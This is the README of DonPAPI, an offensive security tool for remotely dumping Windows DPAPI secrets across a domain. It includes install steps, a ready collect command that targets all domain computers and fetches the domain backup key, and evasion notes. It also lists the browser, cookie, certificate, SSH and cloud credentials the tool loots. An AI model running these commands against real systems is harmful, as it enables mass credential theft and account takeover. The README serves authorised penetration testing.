DonPAPI automates secrets dump remotely on multiple Windows computers, with defense evasion in mind.
Collected credentials:
- Chromium browser Credentials, Cookies and Chrome Refresh Token
- Windows Certificates
- Credential Manager
- Firefox browser Credentials and Cookies
- Mobaxterm Credentials
- MRemoteNg Credentials
- RDC Manager Credentials
- Files on Desktop and and Recent folder
- SCCM Credentials
- Vaults Credentials
- VNC Credentials
- Wifi Credentials
We made a talk in french about DPAPI called DPAPI - Don't Put Administration Passwords In 🇫🇷:
This tool should be install with pipx or in a dedicated virtual environment
pipx install donpapi
or (with latest commits)
pipx install git+https://github.com/login-securite/DonPAPI.git
or (to dev)
git clone git+https://github.com/login-securite/DonPAPI.git
cd DonPAPI
poetry update
poetry run DonPAPI
pipx install donpapi
donpapi collect -u admin -p 'Password123!' -d domain.local -t ALL --fetch-pvk
donpapi gui
usage: DonPAPI [-h] [-v] [-o DIRNAME] {collect,gui} ...
Dump revelant information on compromised targets without AV detection. Version: 2.0.0
positional arguments:
{collect,gui} DonPAPI Action
collect Dump secrets on a target list
gui Spawn a Flask webserver to crawl DonPAPI database
options:
-h, --help show this help message and exit
-v Verbosity level (-v or -vv)
-o DIRNAME, --output-directory DIRNAME
Output directory. Default is ~/.donpapi/loot/
This action is used to collect secrets on the targets specified in -t
.
usage: dpp collect [-h] [--keep-collecting seconds] [--threads Number of threads] [--no-config] [-t TARGET [TARGET ...]] [-d domain.local]
[-u username] [-p password] [-H LMHASH:NTHASH] [--no-pass] [-k] [--aesKey hex key] [--laps Administrator] [--dc-ip IP address]
[-r /home/user/.donpapi/recover/recover_1718281433] [-c COLLECTORS] [-nr] [--fetch-pvk] [--pvkfile PVKFILE]
[--pwdfile PWDFILE] [--ntfile NTFILE] [--mkfile MKFILE]
options:
-h, --help show this help message and exit
--keep-collecting seconds
Rerun the attack against all targets after X seconds, X being the value
--threads Number of threads
Number of threads (default: 50)
--no-config Do not load donpapi config file (~/.donpapi/donpapi.conf)
authentication:
-t TARGET [TARGET ...], --target TARGET [TARGET ...]
the target IP(s), range(s), CIDR(s), hostname(s), FQDN(s), file(s) containing a list of targets, ALL to fetch every
computer hostnames from LDAP
-d domain.local, --domain domain.local
Domain
-u username, --username username
Username
-p password, --password password
Password
-H LMHASH:NTHASH, --hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
--no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid
credentials cannot be found, it will use the ones specified in the command line
--aesKey hex key AES key to use for Kerberos Authentication (1128 or 256 bits)
--laps Administrator use LAPS to request local admin password. The laps parameter value is the local admin account use to connect
--dc-ip IP address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-r /home/user/.donpapi/recover/recover_1718281433, --recover-file /home/user/.donpapi/recover/recover_1718281433
The recover file path. If used, the other parameters will be ignored
attacks:
-c COLLECTORS, --collectors COLLECTORS
Chromium, Certificates, CredMan, Files, Firefox, MobaXterm, MRemoteNG, RDCMan, SCCM, Vaults, VNC, Wifi, All (all
previous) (default: All)
-nr, --no-remoteops Disable Remote Ops operations (basically no Remote Registry operations, no DPAPI System Credentials)
--fetch-pvk Will automatically use domain backup key from database, and if not already dumped, will dump it on a domain controller
--pvkfile PVKFILE Pvk file with domain backup key
--pwdfile PWDFILE File containing username:password that will be used eventually to decrypt masterkeys
--ntfile NTFILE File containing username:nthash that will be used eventually to decrypt masterkeys
--mkfile MKFILE File containing {GUID}:SHA1 masterkeys mappings
Authentication works by specifying a domain with --domain
, an username with --username
, and eventually a password with --password
, a hash with --hashes
, an AES key with --aesKey
or a Kerberos ticket in ccache format with -k
(Impacket style).
You can also authenticate through LAPS on the computer with --laps
and the username of the local LAPS account as the value for this parameter.
By default, DonPAPI will collect:
- Chromium: Chromium browser Credentials, Cookies and Chrome Refresh Token
- Certificates: Windows Certificates
- CredMan: Credential Manager
- Firefox: Firefox browser Credentials and Cookies
- MobaXterm: Mobaxterm Credentials
- MRemoteNg: MRemoteNg Credentials
- RDCMan: RDC Manager Credentials
- Files: Files on Desktop and and Recent folder
- SCCM: SCCM Credentials
- Vaults: Vaults Credentials
- VNC: VNC Credentials
- Wifi: Wifi Credentials
- CloudCredentials: Cloud credentials
- IDEProjects: IDE projects files
- PasswordManagers: Passwords managers files
- PowerShellHistory: PowerShell history files
- RecycleBin: Recycle Bins files
- SSHSecrets: SSH secrets files (keys)
- VersionControlSystems: Versioning tools (git for example)
You can specify each one you want to collect with --collectors
(SharpHound style). If you use --fetch-pvk
, DonPAPI will automatically fetch the Domain Backup Key of the AD domain and use it to decrypt masterkeys. Otherwise, you can bring one with --pvkfile
. --pwdfile
, --ntfile
are used to feed DonPAPI with secrets in order to unlock masterkeys. But if you have freshly decrypted masterkeys, you can use --mkfile
.
Warning
Some collection method will need to dump LSA secrets (in order to obtain the DPAPI machine key). This action can be noizy, and modern EDR will block you instantly. You can use -nr
to avoid doing those noisy actions, but some secrets won't be collected.
DonPAPI now supports a configuration file in order to pimp Secretsdump behaviour. This file will be located at ~/.donpapi/donpapi.conf, and by default, it will looks like this:
[secretsdump]
share = C$
remote_filepath = \Users\Default\AppData\Local\Temp
filename_regex = \d{4}-\d{4}-\d{4}-[0-9]{4}
file_extension = .log
DonPAPI supports recover file. Each time you will run a collect
command, it will save a recover file of the remaining targets and all the options. By default, the file is located in ~/.donpapi/register/ folder
Sometimes on an internal assessment, you want to go hard on some specific targets and collecting secrets on their computer again and again. Don't do a stupid bash loop, just use --keep-collecting X
, X being the seconds you want to wait between each collecting sessions.
Now that you have collected all those secrets, you want to crawl them. DonPAPI allow you to go through all collected secrets with a web GUI. To launch it, use donpapi gui
.
usage: DonPAPI gui [-h] [--bind BIND] [--port PORT] [--ssl] [--basic-auth user:password]
options:
-h, --help show this help message and exit
--bind BIND HTTP Server bind address (default=127.0.0.1)
--port PORT HTTP Server port (default=8088)
--ssl Use an encrypted connection
--basic-auth user:password
Set up a basic auth
General
This screen will show you every SAM reused passwords accross all collected computers, dumped scheduled tasks and service account passwords dumped from LSA. You can export all of them as CSV format.
Secrets
This screen will show you every secrets looted with DonPAPI. You can search on multiple elements and exports secrets in CSV
Cookies
This screen will show you every cookies looted with DonPAPI. You can search on multiple elements and exports cookies in CSV, but also copy paste them into JavaScript code to paste it in your browser.
Certificates
This screen will show you every certificates looted with DonPAPI. You can search on multiple elements and exports certificates in CSV, but also if a certificate allow client auth, then clicking on Yes will copy paste a Certipy command to use the certificate.
This tool is for educational and ethical hacking purpose only. Login Sécurité is not responsible for the abuses committed with this tool.
The GUI frontend is developed in Vue3 + Vite.js, and the backend is Python Flask.
By default, it will be exposed at http://127.0.0.1:8088, but you can expose it the way you like, even at https://0.0.0.0:443.
Warning
Please never expose DonPAPI to a whole network like this, it can be very dangerous. DonPAPI supports HTTPS with --ssl
and you can add a Basic Auth with --basic-auth
. And moreover, please never expose DonPAPI on the Internet like this.
Clicking on a value in the tables will instantly put it in your clipboard.
A Hide Password checkbox is available in the GUI, in order to hide sensitive data in the GUI, perfect for screenshots.
All the credits goes to these great guys for doing the hard research & coding :
- Benjamin Delpy for most of the DPAPI research (always greatly commented, <3 your code)
- All the team working on Impacket (https://github.com/SecureAuthCorp/impacket). Almost everything we do here comes from impacket.
- Alesandro Z & everyone who worked on Lazagne (https://github.com/AlessandroZ/LaZagne/wiki) for the VNC & Firefox modules, and most likely for a lots of other ones in the futur.
- dirkjanm for the GUI idea in Roadtools & every research he ever did. I learned so much on so many subjects thanks to you. <3
- Byt3bl33d3r for CrackMapExec & All the team working on NetExec(lots of inspiration and code comes from CME / NXC projects)
- All the Team at Login Sécurité for their ideas and help in debugging my shitty code (special thanks to @layno & @HackAndDo for that)